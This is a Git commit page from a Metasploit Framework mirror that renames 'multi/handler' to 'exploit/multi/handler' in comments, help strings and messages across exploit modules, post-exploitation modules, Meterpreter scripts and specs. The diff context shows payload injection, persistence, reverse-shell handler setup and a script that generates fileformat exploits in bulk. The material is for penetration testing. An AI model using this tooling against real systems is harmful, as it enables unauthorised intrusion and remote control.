github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-09-04 20:18:27 +02:00
Code Releases Activity

Fix inconstancy - multi/handler

Browse Source
This commit is contained in:
g0tmi1k 2015-06-12 21:23:51 +01:00
parent f279c6ca3f
commit a53ca53a6a
14 changed files with 113 additions and 113 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
modules/exploits/windows/browser/persits_xupload_traversal.rb
View File

@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
an attacker is able to write arbitrary files to arbitrary locations on disk.
Code execution occurs by writing to the All Users Startup Programs directory.
You may want to combine this module with the use of multi/handler since a
You may want to combine this module with the use of exploit/multi/handler since a
user would have to log for the payload to execute.
},
'License' => MSF_LICENSE,

22
modules/exploits/windows/mssql/mssql_linkcrawler.rb
View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
If you are attempting to obtain multiple reverse shells using this module we
recommend setting the "DisablePayloadHandler" advanced option to "true", and setting
up a multi/handler to run in the background as a job to support multiple incoming
up a exploit/multi/handler to run in the background as a job to support multiple incoming
shells.
If you are interested in deploying payloads to spefic servers this module also
@ -89,17 +89,17 @@ class Metasploit3 < Msf::Exploit::Remote
# Define master array to keep track of enumerated database information
masterList = Array.new
masterList[0] = Hash.new # Define new hash
masterList[0]["name"] = "" # Name of the current database server
masterList[0]["db_link"] = "" # Name of the linked database server
masterList[0]["db_user"] = "" # User configured on the database server link
masterList[0]["db_sysadmin"] = "" # Specifies if the database user configured for the link has sysadmin privileges
masterList[0]["db_version"] = "" # Database version of the linked database server
masterList[0]["db_os"] = "" # OS of the linked database server
masterList[0]["path"] = [[]] # Link path used during crawl - all possible link paths stored
masterList[0]["done"] = 0 # Used to determine if linked need to be crawled
masterList[0] = Hash.new # Define new hash
masterList[0]["name"] = "" # Name of the current database server
masterList[0]["db_link"] = "" # Name of the linked database server
masterList[0]["db_user"] = "" # User configured on the database server link
masterList[0]["db_sysadmin"] = "" # Specifies if the database user configured for the link has sysadmin privileges
masterList[0]["db_version"] = "" # Database version of the linked database server
masterList[0]["db_os"] = "" # OS of the linked database server
masterList[0]["path"] = [[]] # Link path used during crawl - all possible link paths stored
masterList[0]["done"] = 0 # Used to determine if linked need to be crawled
shelled = Array.new # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system
shelled = Array.new # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system
# Setup query for gathering information from database servers
versionQuery = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE\

10
modules/post/multi/manage/shell_to_meterpreter.rb
View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
OptInt.new('LPORT',
[false, 'Port for Payload to connect to.', 4433]),
OptBool.new('HANDLER',
[ true, 'Start an Exploit Multi Handler to receive the connection', true])
[ true, 'Start an exploit/multi/handler to receive the connection', true])
], self.class)
deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64')
end
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Post
if datastore['HANDLER']
listener_job_id = create_multihandler(lhost, lport, payload_name)
if listener_job_id.blank?
print_error("Failed to start multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
return nil
end
end
@ -208,7 +208,7 @@ class Metasploit3 < Msf::Post
timer += 1
end
end
print_status('Stopping multi/handler')
print_status('Stopping exploit/multi/handler')
framework.jobs.stop_job(listener_job_id)
}
end
@ -238,12 +238,12 @@ class Metasploit3 < Msf::Post
return false
end
# Starts a multi/handler session
# Starts a exploit/multi/handler session
def create_multihandler(lhost, lport, payload_name)
pay = client.framework.payloads.create(payload_name)
pay.datastore['LHOST'] = lhost
pay.datastore['LPORT'] = lport
print_status('Starting exploit multi handler')
print_status('Starting exploit/multi/handler')
if !check_for_listener(lhost, lport)
# Set options for module
mh = client.framework.exploits.create('multi/handler')

6
modules/post/multi/manage/system_session.rb
View File

@ -28,7 +28,7 @@ class Metasploit3 < Msf::Post
OptInt.new('LPORT',
[false, 'Port for Payload to connect to.', 4433]),
OptBool.new('HANDLER',
[ true, 'Start an Exploit Multi Handler to receive the connection', false]),
[ true, 'Start an exploit/multi/handler to receive the connection', false]),
OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',
'auto', ['auto','ruby','python','perl','bash']])
], self.class)
@ -111,12 +111,12 @@ class Metasploit3 < Msf::Post
return conflict
end
# Starts a multi/handler session
# Starts a exploit/multi/handler session
def create_multihand(lhost,lport)
pay = client.framework.payloads.create("generic/shell_reverse_tcp")
pay.datastore['LHOST'] = lhost
pay.datastore['LPORT'] = lport
print_status("Starting exploit multi handler")
print_status("Starting exploit/multi/handler")
if not check_for_listner(lhost,lport)
# Set options for module
mul = client.framework.exploits.create("multi/handler")

2
modules/post/windows/manage/multi_meterpreter_inject.rb
View File

@ -32,7 +32,7 @@ class Metasploit3 < Msf::Post
OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]),
OptString.new('IPLIST', [true, 'List of semicolom separated IP list.', Rex::Socket.source_address("1.2.3.4")]),
OptString.new('PIDLIST', [false, 'List of semicolom separated PID list.', '']),
OptBool.new('HANDLER', [false, 'Start new multi/handler job on local box.', false]),
OptBool.new('HANDLER', [false, 'Start new exploit/multi/handler job on local box.', false]),
OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1])
], self.class)

6
modules/post/windows/manage/payload_inject.rb
View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),
OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),
OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']),
OptBool.new('HANDLER', [ false, 'Start an Exploit Multi Handler to receive the connection', false]),
OptBool.new('HANDLER', [ false, 'Start an exploit/multi/handler to receive the connection', false]),
OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."]),
OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1])
], self.class)
@ -112,9 +112,9 @@ class Metasploit3 < Msf::Post
return pay
end
# Starts a multi/handler session
# Starts a exploit/multi/handler session
def create_multihand(pay,pay_name,lhost,lport)
print_status("Starting exploit multi handler")
print_status("Starting exploit/multi/handler")
if not check_for_listner(lhost,lport)
# Set options for module
mul = client.framework.exploits.create("multi/handler")

4
msfcli
View File

@ -95,7 +95,7 @@ class Msfcli
$stdout.puts "Error: #{str}\n\n" if str
$stdout.puts tbl.to_s + "\n"
$stdout.puts "Examples:" + "\n"
$stdout.puts "msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E" + "\n"
$stdout.puts "msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E" + "\n"
$stdout.puts "msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E" + "\n"
$stdout.puts extra + "\n" if extra
$stdout.puts
@ -542,7 +542,7 @@ class Msfcli
show_payloads(modules)
end
when "t"
puts
puts
if modules[:module].file_path =~ /auxiliary\//i
$stdout.puts("\nError: This type of module does not support targets")
else

2
scripts/meterpreter/duplicate.rb
View File

@ -23,7 +23,7 @@ opts = Rex::Parser::Arguments.new(
"-e" => [ true, "Executable to inject into. Default notepad.exe, will fall back to spawn if not found."],
"-P" => [ true, "Process id to inject into; use instead of -e if multiple copies of one executable are running."],
"-s" => [ false, "Spawn new executable to inject to. Only useful with -P."],
"-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"]
"-D" => [ false, "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"]
)
#

4
scripts/meterpreter/metsvc.rb
View File

@ -18,7 +18,7 @@ session = client
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "This help menu"],
"-r" => [ false, "Uninstall an existing Meterpreter service (files must be deleted manually)"],
"-A" => [ false, "Automatically start a matching multi/handler to connect to the service"]
"-A" => [ false, "Automatically start a matching exploit/multi/handler to connect to the service"]
)
# Exec a command and return the results
@ -117,7 +117,7 @@ if client.platform =~ /win32|win64/
end
#
# Setup the multi/handler if requested
# Setup the exploit/multi/handler if requested
#
if(autoconn)
print_status("Trying to connect to the Meterpreter service at #{client.session_host}:#{rport}...")

2
scripts/meterpreter/multi_meter_inject.rb
View File

@ -21,7 +21,7 @@ start_handler = nil
@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-p" => [ true, "The port on the remote host where Metasploit is listening (default: 4444)"],
"-m" => [ false, "Start Exploit multi/handler for return connection"],
"-m" => [ false, "Start exploit/multi/handler for return connection"],
"-pt" => [ true, "Specify Reverse Connection Meterpreter Payload. Default windows/meterpreter/reverse_tcp"],
"-mr" => [ true, "Provide Multiple IP Addresses for Connections separated by comma."],
"-mp" => [ true, "Provide Multiple PID for connections separated by comma one per IP."]

4
scripts/meterpreter/persistence.rb
View File

@ -35,7 +35,7 @@ script_on_target = nil
"-X" => [ false, "Automatically start the agent when the system boots"],
"-U" => [ false, "Automatically start the agent when the User logs on"],
"-S" => [ false, "Automatically start the agent on boot as a service (with SYSTEM privileges)"],
"-A" => [ false, "Automatically start a matching multi/handler to connect to the agent"],
"-A" => [ false, "Automatically start a matching exploit/multi/handler to connect to the agent"],
"-L" => [ true, "Location in target host to write payload to, if none \%TEMP\% will be used."],
"-T" => [ true, "Alternate executable template to use"],
"-P" => [ true, "Payload to use, default is windows/meterpreter/reverse_tcp."]
@ -237,7 +237,7 @@ raw = create_payload(payload_type, rhost, rport)
script = create_script(delay, altexe, raw, payload_type.include?('/x64/'))
script_on_target = write_script_to_target(target_dir, script)
# Start Multi/Handler
# Start exploit/multi/handler
if autoconn
set_handler(payload_type, rhost, rport)
end

4
scripts/meterpreter/vnc.rb
View File

@ -21,7 +21,7 @@ opts = Rex::Parser::Arguments.new(
"-v" => [ true, "The local port for the VNC proxy service (default: 5900)"],
"-i" => [ false, "Inject the vnc server into a new process's memory instead of building an exe"],
"-P" => [ true, "Executable to inject into (starts a new process). Only useful with -i (default: notepad.exe)"],
"-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"],
"-D" => [ false, "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"],
"-O" => [ false, "Disable binding the VNC proxy to localhost (open it to the network)"],
"-V" => [ false, "Disable the automatic launch of the VNC client"],
"-t" => [ false, "Tunnel through the current session connection. (Will be slower)"],
@ -176,7 +176,7 @@ else
end
if tunnel
# Set up a port forward for the multi/handler to use for uploading the stage
# Set up a port forward for the exploit/multi/handler to use for uploading the stage
print_status("Starting the port forwarding from #{rport} => TARGET:#{rport}")
client.run_cmd("portfwd add -L 127.0.0.1 -l #{rport} -p #{rport} -r #{lhost}")
end

146
scripts/resource/fileformat_generator.rc
View File

@ -1,42 +1,42 @@
<ruby>
if (framework.datastore['WIN_PAYL'] != nil)
winpayl = framework.datastore['WIN_PAYL']
winpayl = framework.datastore['WIN_PAYL']
else
# no payload defined -> we use a messagebox payload :)
winpayl = "windows/messagebox"
# no payload defined -> we use a messagebox payload :)
winpayl = "windows/messagebox"
end
if (framework.datastore['OSX_PAYL'] != nil)
osxpayl = framework.datastore['OSX_PAYL']
osxpayl = framework.datastore['OSX_PAYL']
else
# no payload defined -> we use a generic bind payload :)
osxpayl = "generic/shell_bind_tcp"
# no payload defined -> we use a generic bind payload :)
osxpayl = "generic/shell_bind_tcp"
end
if (framework.datastore['MULTI_PAYL'] != nil)
multipayl = framework.datastore['MULTI_PAYL']
multipayl = framework.datastore['MULTI_PAYL']
else
# no payload defined -> we use a generic bind payload :)
multipayl = "generic/shell_bind_tcp"
# no payload defined -> we use a generic bind payload :)
multipayl = "generic/shell_bind_tcp"
end
if (framework.datastore['LHOST'] == nil and (winpayl =~ /reverse/ or osxpayl =~ /reverse/ or multipayl =~ /reverse/))
print_error("please define a global LHOST Variable")
return
print_error("please define a global LHOST Variable")
return
else
localIP = framework.datastore['LHOST']
localIP = framework.datastore['LHOST']
end
if (framework.datastore['VERBOSE'] == "true")
verbose = 1 #true
verbose = 1 #true
else
verbose = 0
verbose = 0
end
if (framework.datastore['HANDLERS'] == "true")
handlers = 1 #true
handlers = 1 #true
else
handlers = 0
handlers = 0
end
windows = false
@ -44,66 +44,66 @@ multi = false
osx = false
framework.exploits.each do |exploit,mod|
if(exploit.to_s =~ /fileformat/)
print_line("generating fileformat exploit: #{exploit.to_s}")
run_single("use #{exploit}")
if(exploit.to_s =~ /windows/)
#we need this info for starting the handlers
windows = true
#setting the payload
run_single("set PAYLOAD #{winpayl}")
if(winpayl =~ /reverse/)
run_single("set LHOST #{localIP}")
run_single("set LPORT 4444")
end
elsif(exploit.to_s =~ /multi/)
#we need this info for starting the handlers
multi = true
#setting the payload
run_single("set PAYLOAD #{multipayl}")
if(winpayl =~ /reverse/)
run_single("set LHOST #{localIP}")
run_single("set LPORT 5555")
end
elsif(exploit.to_s =~ /osx/)
#we need this info for starting the handlers
osx = true
#setting the payload
run_single("set PAYLOAD #{osxpayl}")
if(osxpayl =~ /reverse/)
run_single("set LHOST #{localIP}")
run_single("set LPORT 6666")
end
end
extension = active_module.datastore['FILENAME'].split('.').last
filename = exploit.split('/').last
run_single("set FILENAME #{filename}.#{extension}")
run_single("exploit")
print_line
end
if(exploit.to_s =~ /fileformat/)
print_line("generating fileformat exploit: #{exploit.to_s}")
run_single("use #{exploit}")
if(exploit.to_s =~ /windows/)
#we need this info for starting the handlers
windows = true
#setting the payload
run_single("set PAYLOAD #{winpayl}")
if(winpayl =~ /reverse/)
run_single("set LHOST #{localIP}")
run_single("set LPORT 4444")
end
elsif(exploit.to_s =~ /multi/)
#we need this info for starting the handlers
multi = true
#setting the payload
run_single("set PAYLOAD #{multipayl}")
if(winpayl =~ /reverse/)
run_single("set LHOST #{localIP}")
run_single("set LPORT 5555")
end
elsif(exploit.to_s =~ /osx/)
#we need this info for starting the handlers
osx = true
#setting the payload
run_single("set PAYLOAD #{osxpayl}")
if(osxpayl =~ /reverse/)
run_single("set LHOST #{localIP}")
run_single("set LPORT 6666")
end
end
extension = active_module.datastore['FILENAME'].split('.').last
filename = exploit.split('/').last
run_single("set FILENAME #{filename}.#{extension}")
run_single("exploit")
print_line
end
end
if(handlers == 1)
#starting some handlers for reverse connections
run_single("use multi/handler")
if(windows == true and winpayl =~ /reverse/)
run_single("set PAYLOAD #{winpayl}")
run_single("set LHOST #{localIP}")
run_single("set LPORT 4444")
run_single("exploit -j")
end
if(multi == true and multipayl =~ /reverse/)
run_single("set PAYLOAD #{multipayl}")
run_single("set LHOST #{localIP}")
run_single("set LPORT 5555")
run_single("exploit -j")
end
if(osx == true and osxpayl =~ /reverse/)
run_single("set PAYLOAD #{osxpayl}")
run_single("set LHOST #{localIP}")
run_single("set LPORT 6666")
run_single("exploit -j")
end
#starting some handlers for reverse connections
run_single("use exploit/multi/handler")
if(windows == true and winpayl =~ /reverse/)
run_single("set PAYLOAD #{winpayl}")
run_single("set LHOST #{localIP}")
run_single("set LPORT 4444")
run_single("exploit -j")
end
if(multi == true and multipayl =~ /reverse/)
run_single("set PAYLOAD #{multipayl}")
run_single("set LHOST #{localIP}")
run_single("set LPORT 5555")
run_single("exploit -j")
end
if(osx == true and osxpayl =~ /reverse/)
run_single("set PAYLOAD #{osxpayl}")
run_single("set LHOST #{localIP}")
run_single("set LPORT 6666")
run_single("exploit -j")
end
end
run_single("back")
</ruby>

12
spec/msfcli_spec.rb
View File

@ -289,8 +289,8 @@ describe Msfcli, :content do
}
end
end
context "#guess_nop_name" do
subject(:guess_nop_name) {
msfcli.guess_nop_name(nop_reference_name)
@ -555,8 +555,8 @@ describe Msfcli, :content do
expect(modules[:module].fullname).to eq(module_name)
end
end
context 'with multi/handler' do
context 'with exploit/multi/handler' do
let(:module_name) {
'multi/handler'
}
@ -571,14 +571,14 @@ describe Msfcli, :content do
expect(modules[:module]).to be_an Msf::Exploit
expect(modules[:module].refname).to eq(module_name)
end
context 'with payload' do
let(:args) {
super().tap { |args|
args.insert(-2, "payload=#{payload_reference_name}")
}
}
context 'windows/meterpreter/reverse_tcp' do
let(:payload_reference_name) do
'windows/meterpreter/reverse_tcp'